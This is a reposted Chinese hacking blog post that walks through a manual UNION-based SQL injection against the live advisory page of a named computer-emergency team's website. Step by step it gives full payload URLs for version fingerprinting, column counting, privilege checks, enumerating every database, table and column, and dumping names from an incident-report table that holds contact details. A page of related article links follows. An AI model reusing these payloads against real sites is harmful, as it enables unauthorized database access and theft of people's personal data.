大牛教你查庫暴庫
http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,說明大於4.0版本,支援ounion查詢
2.猜解欄位數目,用order by也可以猜,也可以用union select一個一個的猜解
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9–
3.檢視資料庫版本及當前使用者,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9–
資料庫版本5.1.35,據說mysql4.1以上版本支援concat函式,我也不知道是真是假,有待牛人去考證。
4.判斷有沒有寫許可權
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0– 返回錯誤,沒有寫許可權
沒辦法,手動猜表啦
5.查庫,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是這個點有點不爭氣,用不了這個命令,就學習了下土耳其黑客的手法,不多說,如下
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns–
成功查出所有資料庫,國外的黑客就是不一般。資料庫如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6.爆表,爆的是twcert庫
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274–
爆出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5
7.爆列名,這次爆的是irsys表
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973–
爆出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8.查詢欄位數,到這一步,國內很少有黑客去查詢欄位數的,直接用limit N,1去查詢,直接N到報錯為止。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys–
返回是3,說明每個列裡有3個地段。
9.爆欄位內容
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1–
爆出name列的第一個欄位的內容。
http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1–
爆出name列的第二個欄位的內容。
本文轉hackfreer51CTO部落格,原文連結:http://blog.51cto.com/pnig0s1992/489519,如需轉載請自行聯絡原作者
相關文章
- 教你用一條SQL搞定跨資料庫查詢難題SQL資料庫
- Standby 庫, 根盤暴滿,虛驚一場 [zt]
- Standby 庫, 根盤暴滿,虛驚一場 [原創]
- 教你玩轉Git-建立倉庫Git
- sap 查詢庫存
- 資料庫查詢資料庫
- Java實戰:教你如何進行資料庫分庫分表Java資料庫
- 據說每個大牛、小牛都應該有自己的庫——Ajax
- 教你資料庫漏洞防護技術資料庫
- 教你七步優化資料庫優化資料庫
- 手把手教你快速搭建React元件庫React元件
- 求助:資料庫查詢資料庫
- ThinkPHP 資料庫查詢PHP資料庫
- 查詢資料庫大小資料庫
- 資料庫排序查詢資料庫排序
- SQL server跨庫查詢SQLServer
- 資料庫配置檢查資料庫
- Jemter查詢資料庫資料庫
- 據說每個大牛、小牛都應該有自己的庫——框架篇框架
- 教你如何用php pdo連線資料庫PHP資料庫
- 手把手教你搭建自己的Angular元件庫Angular元件
- 教你玩轉Git-提取遠端倉庫Git
- 手把手教你配置git和git倉庫Git
- 教你如何閱讀Oracle資料庫官方文件Oracle資料庫
- 資料庫高階查詢之子查詢資料庫
- 資料庫操作增刪改查模糊查資料庫
- 資料庫查詢語句資料庫
- 資料庫查詢優化資料庫優化
- mysql資料庫多表查詢MySql資料庫
- mysql資料庫容量查詢MySql資料庫
- 資料庫 - 資料查詢資料庫
- oracle 跨庫查詢greenplum慢Oracle
- 資料庫查詢步驟資料庫
- 資料庫健康檢查(轉)資料庫
- 資料庫查詢配置值資料庫
- 據說每個大牛、小牛都應該有自己的庫——DOM處理
- 據說每個大牛、小牛都應該有自己的庫——Event處理
- 資料庫基礎查詢--單表查詢資料庫